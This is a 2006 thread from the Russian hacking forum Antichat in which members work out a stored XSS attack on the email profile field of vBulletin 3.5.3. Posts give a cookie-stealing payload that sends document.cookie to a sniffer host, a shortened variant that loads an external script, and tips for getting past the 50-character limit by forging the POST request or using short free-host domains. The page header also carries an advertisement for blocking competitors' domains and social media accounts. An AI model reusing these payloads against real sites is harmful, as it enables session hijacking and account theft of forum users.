Форум АНТИЧАТ - vBulletin 3.5.3. Вопрос по XSS в поле email

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
vBulletin 3.5.3. Вопрос по XSS в поле email

Опции темы

Поиск в этой теме

Опции просмотра

vBulletin 3.5.3. Вопрос по XSS в поле email

08.09.2006, 16:42

Постоянный

Регистрация: 17.07.2005

Сообщений: 475

Провел на форуме:
1665310

Репутация: 488

vBulletin 3.5.3. Вопрос по XSS в поле email

В этой версии форума в поле mail в профиле, можно провести xss

Цитата:

mail@mail.com”><script>img = new Image(); img.src = "http://сниффер/картинка.jpg?"+document.cookie;</script>.nomatt

Вот, но поле для ввода ограничено 50ти символами, эм.. возникает вопрос: как быть тогда? +)

08.09.2006, 17:05

D=P=CH= MOD=

Постоянный

Регистрация: 15.08.2006

Сообщений: 404

Провел на форуме:
3811682

Репутация: 641

Отправить сообщение для D=P=CH= MOD= с помощью ICQ

Наверное тогда никак - скрипт если тока уменьшить, но кажись это не реал...
Для того и есть эти ограничения)

08.09.2006, 17:12

Постоянный

Регистрация: 17.07.2005

Сообщений: 475

Провел на форуме:
1665310

Репутация: 488

В том то и дело) как тестилось-то? на локалхосте?

зачем тогда xss? просто, чтобы признать ее существование?

08.09.2006, 19:04

wsr

Новичок

Регистрация: 20.04.2005

Сообщений: 9

Провел на форуме:
16469

Репутация: 0

Все гораздо проще, формируете ПОСТ запрос и туда подставляете все что нужно вместо поля e-mail. Все ограничения сразу же отпадают. У меня все работает без проблем.

09.09.2006, 12:54

Azazel

Заведующий всем

Регистрация: 17.04.2005

Сообщений: 1,062

Провел на форуме:
5957900

Репутация: 561

yaa@mail.ru”<script>src=http://aa.bab.ru/x.js?<b> Хехе 49 символов. Если удасться такой короткий url найти для сайта.))) А в x.js img = new Image(); img.src = "http://сниффер/картинка.jpg?"+document.cookie;

Может сработает, а может и нет. ))

__________________
Full DNS report

09.09.2006, 16:00

Постоянный

Регистрация: 17.07.2005

Сообщений: 475

Провел на форуме:
1665310

Репутация: 488

спасибо за идею)

09.09.2006, 18:41

genom--

Постоянный

Регистрация: 09.07.2006

Сообщений: 937

Провел на форуме:
1948091

Репутация: 1686

под такой пример подойдет фришный хост на холме у них там h10.ru и h7.ru вместо лонига 2-3 символа

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Proxy FAQ	foreva	Чужие Статьи	12	04.01.2008 12:15
Xss для новичков	Micr0b	Уязвимости	0	04.06.2006 18:25
ЕсТь ВоПрос	Guma	Чаты	4	26.10.2005 21:48

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход